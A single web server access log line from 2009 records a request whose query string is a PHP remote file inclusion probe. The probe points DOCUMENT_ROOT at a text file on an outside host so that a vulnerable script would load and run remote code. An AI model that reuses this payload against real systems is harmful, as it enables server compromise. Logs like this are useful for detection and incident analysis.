64.34.111.74 - - [13/Dec/2009:12:42:11 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 200 14947 "-" "Mozilla/5.0" "www.dmulk.com"
